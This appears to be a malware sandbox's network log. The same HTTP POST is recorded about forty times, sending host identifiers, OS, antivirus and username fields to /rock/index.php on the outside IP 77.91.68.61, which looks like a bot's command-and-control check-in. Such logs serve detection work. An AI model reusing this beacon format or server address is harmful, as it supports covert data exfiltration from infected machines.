Source: global traffic	HTTP traffic detected: POST /rock/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 77.91.68.61Content-Length: 88Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 38 36 26 73 64 3d 38 38 63 38 62 62 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 32 38 37 34 30 30 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 30 Data Ascii: id=853321935212&vs=3.86&sd=88c8bb&os=1&bi=1&ar=0&pc=287400&un=user&dm=&av=13&lv=0&og=0
Source: global traffic	HTTP traffic detected: POST /rock/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 77.91.68.61Content-Length: 88Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 38 36 26 73 64 3d 38 38 63 38 62 62 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 32 38 37 34 30 30 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 30 Data Ascii: id=853321935212&vs=3.86&sd=88c8bb&os=1&bi=1&ar=0&pc=287400&un=user&dm=&av=13&lv=0&og=0
Source: global traffic	HTTP traffic detected: POST /rock/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 77.91.68.61Content-Length: 88Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 38 36 26 73 64 3d 38 38 63 38 62 62 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 32 38 37 34 30 30 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 30 Data Ascii: id=853321935212&vs=3.86&sd=88c8bb&os=1&bi=1&ar=0&pc=287400&un=user&dm=&av=13&lv=0&og=0
Source: global traffic	HTTP traffic detected: POST /rock/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 77.91.68.61Content-Length: 88Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 38 36 26 73 64 3d 38 38 63 38 62 62 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 32 38 37 34 30 30 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 30 Data Ascii: id=853321935212&vs=3.86&sd=88c8bb&os=1&bi=1&ar=0&pc=287400&un=user&dm=&av=13&lv=0&og=0
Source: global traffic	HTTP traffic detected: POST /rock/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 77.91.68.61Content-Length: 88Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 38 36 26 73 64 3d 38 38 63 38 62 62 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 32 38 37 34 30 30 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 30 Data Ascii: id=853321935212&vs=3.86&sd=88c8bb&os=1&bi=1&ar=0&pc=287400&un=user&dm=&av=13&lv=0&og=0
Source: global traffic	HTTP traffic detected: POST /rock/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 77.91.68.61Content-Length: 88Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 38 36 26 73 64 3d 38 38 63 38 62 62 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 32 38 37 34 30 30 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 30 Data Ascii: id=853321935212&vs=3.86&sd=88c8bb&os=1&bi=1&ar=0&pc=287400&un=user&dm=&av=13&lv=0&og=0
Source: global traffic	HTTP traffic detected: POST /rock/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 77.91.68.61Content-Length: 88Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 38 36 26 73 64 3d 38 38 63 38 62 62 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 32 38 37 34 30 30 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 30 Data Ascii: id=853321935212&vs=3.86&sd=88c8bb&os=1&bi=1&ar=0&pc=287400&un=user&dm=&av=13&lv=0&og=0
Source: global traffic	HTTP traffic detected: POST /rock/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 77.91.68.61Content-Length: 88Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 38 36 26 73 64 3d 38 38 63 38 62 62 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 32 38 37 34 30 30 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 30 Data Ascii: id=853321935212&vs=3.86&sd=88c8bb&os=1&bi=1&ar=0&pc=287400&un=user&dm=&av=13&lv=0&og=0
Source: global traffic	HTTP traffic detected: POST /rock/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 77.91.68.61Content-Length: 88Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 38 36 26 73 64 3d 38 38 63 38 62 62 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 32 38 37 34 30 30 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 30 Data Ascii: id=853321935212&vs=3.86&sd=88c8bb&os=1&bi=1&ar=0&pc=287400&un=user&dm=&av=13&lv=0&og=0
Source: global traffic	HTTP traffic detected: POST /rock/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 77.91.68.61Content-Length: 88Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 38 36 26 73 64 3d 38 38 63 38 62 62 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 32 38 37 34 30 30 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 30 Data Ascii: id=853321935212&vs=3.86&sd=88c8bb&os=1&bi=1&ar=0&pc=287400&un=user&dm=&av=13&lv=0&og=0
Source: global traffic	HTTP traffic detected: POST /rock/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 77.91.68.61Content-Length: 88Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 38 36 26 73 64 3d 38 38 63 38 62 62 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 32 38 37 34 30 30 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 30 Data Ascii: id=853321935212&vs=3.86&sd=88c8bb&os=1&bi=1&ar=0&pc=287400&un=user&dm=&av=13&lv=0&og=0
Source: global traffic	HTTP traffic detected: POST /rock/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 77.91.68.61Content-Length: 88Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 38 36 26 73 64 3d 38 38 63 38 62 62 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 32 38 37 34 30 30 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 30 Data Ascii: id=853321935212&vs=3.86&sd=88c8bb&os=1&bi=1&ar=0&pc=287400&un=user&dm=&av=13&lv=0&og=0
Source: global traffic	HTTP traffic detected: POST /rock/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 77.91.68.61Content-Length: 88Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 38 36 26 73 64 3d 38 38 63 38 62 62 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 32 38 37 34 30 30 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 30 Data Ascii: id=853321935212&vs=3.86&sd=88c8bb&os=1&bi=1&ar=0&pc=287400&un=user&dm=&av=13&lv=0&og=0
Source: global traffic	HTTP traffic detected: POST /rock/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 77.91.68.61Content-Length: 88Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 38 36 26 73 64 3d 38 38 63 38 62 62 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 32 38 37 34 30 30 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 30 Data Ascii: id=853321935212&vs=3.86&sd=88c8bb&os=1&bi=1&ar=0&pc=287400&un=user&dm=&av=13&lv=0&og=0
Source: global traffic	HTTP traffic detected: POST /rock/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 77.91.68.61Content-Length: 88Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 38 36 26 73 64 3d 38 38 63 38 62 62 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 32 38 37 34 30 30 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 30 Data Ascii: id=853321935212&vs=3.86&sd=88c8bb&os=1&bi=1&ar=0&pc=287400&un=user&dm=&av=13&lv=0&og=0
Source: global traffic	HTTP traffic detected: POST /rock/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 77.91.68.61Content-Length: 88Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 38 36 26 73 64 3d 38 38 63 38 62 62 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 32 38 37 34 30 30 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 30 Data Ascii: id=853321935212&vs=3.86&sd=88c8bb&os=1&bi=1&ar=0&pc=287400&un=user&dm=&av=13&lv=0&og=0
Source: global traffic	HTTP traffic detected: POST /rock/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 77.91.68.61Content-Length: 88Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 38 36 26 73 64 3d 38 38 63 38 62 62 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 32 38 37 34 30 30 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 30 Data Ascii: id=853321935212&vs=3.86&sd=88c8bb&os=1&bi=1&ar=0&pc=287400&un=user&dm=&av=13&lv=0&og=0
Source: global traffic	HTTP traffic detected: POST /rock/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 77.91.68.61Content-Length: 88Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 38 36 26 73 64 3d 38 38 63 38 62 62 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 32 38 37 34 30 30 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 30 Data Ascii: id=853321935212&vs=3.86&sd=88c8bb&os=1&bi=1&ar=0&pc=287400&un=user&dm=&av=13&lv=0&og=0
Source: global traffic	HTTP traffic detected: POST /rock/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 77.91.68.61Content-Length: 88Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 38 36 26 73 64 3d 38 38 63 38 62 62 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 32 38 37 34 30 30 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 30 Data Ascii: id=853321935212&vs=3.86&sd=88c8bb&os=1&bi=1&ar=0&pc=287400&un=user&dm=&av=13&lv=0&og=0
Source: global traffic	HTTP traffic detected: POST /rock/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 77.91.68.61Content-Length: 88Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 38 36 26 73 64 3d 38 38 63 38 62 62 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 32 38 37 34 30 30 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 30 Data Ascii: id=853321935212&vs=3.86&sd=88c8bb&os=1&bi=1&ar=0&pc=287400&un=user&dm=&av=13&lv=0&og=0
Source: global traffic	HTTP traffic detected: POST /rock/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 77.91.68.61Content-Length: 88Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 38 36 26 73 64 3d 38 38 63 38 62 62 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 32 38 37 34 30 30 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 30 Data Ascii: id=853321935212&vs=3.86&sd=88c8bb&os=1&bi=1&ar=0&pc=287400&un=user&dm=&av=13&lv=0&og=0
Source: global traffic	HTTP traffic detected: POST /rock/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 77.91.68.61Content-Length: 88Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 38 36 26 73 64 3d 38 38 63 38 62 62 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 32 38 37 34 30 30 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 30 Data Ascii: id=853321935212&vs=3.86&sd=88c8bb&os=1&bi=1&ar=0&pc=287400&un=user&dm=&av=13&lv=0&og=0
Source: global traffic	HTTP traffic detected: POST /rock/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 77.91.68.61Content-Length: 88Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 38 36 26 73 64 3d 38 38 63 38 62 62 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 32 38 37 34 30 30 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 30 Data Ascii: id=853321935212&vs=3.86&sd=88c8bb&os=1&bi=1&ar=0&pc=287400&un=user&dm=&av=13&lv=0&og=0
Source: global traffic	HTTP traffic detected: POST /rock/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 77.91.68.61Content-Length: 88Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 38 36 26 73 64 3d 38 38 63 38 62 62 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 32 38 37 34 30 30 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 30 Data Ascii: id=853321935212&vs=3.86&sd=88c8bb&os=1&bi=1&ar=0&pc=287400&un=user&dm=&av=13&lv=0&og=0
Source: global traffic	HTTP traffic detected: POST /rock/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 77.91.68.61Content-Length: 88Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 38 36 26 73 64 3d 38 38 63 38 62 62 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 32 38 37 34 30 30 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 30 Data Ascii: id=853321935212&vs=3.86&sd=88c8bb&os=1&bi=1&ar=0&pc=287400&un=user&dm=&av=13&lv=0&og=0
Source: global traffic	HTTP traffic detected: POST /rock/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 77.91.68.61Content-Length: 88Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 38 36 26 73 64 3d 38 38 63 38 62 62 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 32 38 37 34 30 30 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 30 Data Ascii: id=853321935212&vs=3.86&sd=88c8bb&os=1&bi=1&ar=0&pc=287400&un=user&dm=&av=13&lv=0&og=0
Source: global traffic	HTTP traffic detected: POST /rock/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 77.91.68.61Content-Length: 88Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 38 36 26 73 64 3d 38 38 63 38 62 62 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 32 38 37 34 30 30 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 30 Data Ascii: id=853321935212&vs=3.86&sd=88c8bb&os=1&bi=1&ar=0&pc=287400&un=user&dm=&av=13&lv=0&og=0
Source: global traffic	HTTP traffic detected: POST /rock/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 77.91.68.61Content-Length: 88Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 38 36 26 73 64 3d 38 38 63 38 62 62 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 32 38 37 34 30 30 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 30 Data Ascii: id=853321935212&vs=3.86&sd=88c8bb&os=1&bi=1&ar=0&pc=287400&un=user&dm=&av=13&lv=0&og=0
Source: global traffic	HTTP traffic detected: POST /rock/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 77.91.68.61Content-Length: 88Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 38 36 26 73 64 3d 38 38 63 38 62 62 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 32 38 37 34 30 30 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 30 Data Ascii: id=853321935212&vs=3.86&sd=88c8bb&os=1&bi=1&ar=0&pc=287400&un=user&dm=&av=13&lv=0&og=0
Source: global traffic	HTTP traffic detected: POST /rock/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 77.91.68.61Content-Length: 88Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 38 36 26 73 64 3d 38 38 63 38 62 62 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 32 38 37 34 30 30 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 30 Data Ascii: id=853321935212&vs=3.86&sd=88c8bb&os=1&bi=1&ar=0&pc=287400&un=user&dm=&av=13&lv=0&og=0
Source: global traffic	HTTP traffic detected: POST /rock/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 77.91.68.61Content-Length: 88Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 38 36 26 73 64 3d 38 38 63 38 62 62 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 32 38 37 34 30 30 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 30 Data Ascii: id=853321935212&vs=3.86&sd=88c8bb&os=1&bi=1&ar=0&pc=287400&un=user&dm=&av=13&lv=0&og=0
Source: global traffic	HTTP traffic detected: POST /rock/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 77.91.68.61Content-Length: 88Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 38 36 26 73 64 3d 38 38 63 38 62 62 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 32 38 37 34 30 30 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 30 Data Ascii: id=853321935212&vs=3.86&sd=88c8bb&os=1&bi=1&ar=0&pc=287400&un=user&dm=&av=13&lv=0&og=0
Source: global traffic	HTTP traffic detected: POST /rock/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 77.91.68.61Content-Length: 88Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 38 36 26 73 64 3d 38 38 63 38 62 62 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 32 38 37 34 30 30 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 30 Data Ascii: id=853321935212&vs=3.86&sd=88c8bb&os=1&bi=1&ar=0&pc=287400&un=user&dm=&av=13&lv=0&og=0
Source: global traffic	HTTP traffic detected: POST /rock/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 77.91.68.61Content-Length: 88Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 38 36 26 73 64 3d 38 38 63 38 62 62 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 32 38 37 34 30 30 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 30 Data Ascii: id=853321935212&vs=3.86&sd=88c8bb&os=1&bi=1&ar=0&pc=287400&un=user&dm=&av=13&lv=0&og=0
Source: global traffic	HTTP traffic detected: POST /rock/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 77.91.68.61Content-Length: 88Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 38 36 26 73 64 3d 38 38 63 38 62 62 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 32 38 37 34 30 30 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 30 Data Ascii: id=853321935212&vs=3.86&sd=88c8bb&os=1&bi=1&ar=0&pc=287400&un=user&dm=&av=13&lv=0&og=0
Source: global traffic	HTTP traffic detected: POST /rock/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 77.91.68.61Content-Length: 88Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 38 36 26 73 64 3d 38 38 63 38 62 62 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 32 38 37 34 30 30 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 30 Data Ascii: id=853321935212&vs=3.86&sd=88c8bb&os=1&bi=1&ar=0&pc=287400&un=user&dm=&av=13&lv=0&og=0
Source: global traffic	HTTP traffic detected: POST /rock/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 77.91.68.61Content-Length: 88Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 38 36 26 73 64 3d 38 38 63 38 62 62 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 32 38 37 34 30 30 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 30 Data Ascii: id=853321935212&vs=3.86&sd=88c8bb&os=1&bi=1&ar=0&pc=287400&un=user&dm=&av=13&lv=0&og=0
Source: global traffic	HTTP traffic detected: POST /rock/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 77.91.68.61Content-Length: 88Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 38 36 26 73 64 3d 38 38 63 38 62 62 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 32 38 37 34 30 30 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 30 Data Ascii: id=853321935212&vs=3.86&sd=88c8bb&os=1&bi=1&ar=0&pc=287400&un=user&dm=&av=13&lv=0&og=0
Source: global traffic	HTTP traffic detected: POST /rock/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 77.91.68.61Content-Length: 88Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 38 36 26 73 64 3d 38 38 63 38 62 62 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 32 38 37 34 30 30 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 30 Data Ascii: id=853321935212&vs=3.86&sd=88c8bb&os=1&bi=1&ar=0&pc=287400&un=user&dm=&av=13&lv=0&og=0
Source: global traffic	HTTP traffic detected: POST /rock/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 77.91.68.61Content-Length: 88Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 38 36 26 73 64 3d 38 38 63 38 62 62 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 32 38 37 34 30 30 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 30 Data Ascii: id=853321935212&vs=3.86&sd=88c8bb&os=1&bi=1&ar=0&pc=287400&un=user&dm=&av=13&lv=0&og=0
Source: global traffic	HTTP traffic detected: POST /rock/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 77.91.68.61Content-Length: 88Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 38 36 26 73 64 3d 38 38 63 38 62 62 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 32 38 37 34 30 30 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 30 Data Ascii: id=853321935212&vs=3.86&sd=88c8bb&os=1&bi=1&ar=0&pc=287400&un=user&dm=&av=13&lv=0&og=0
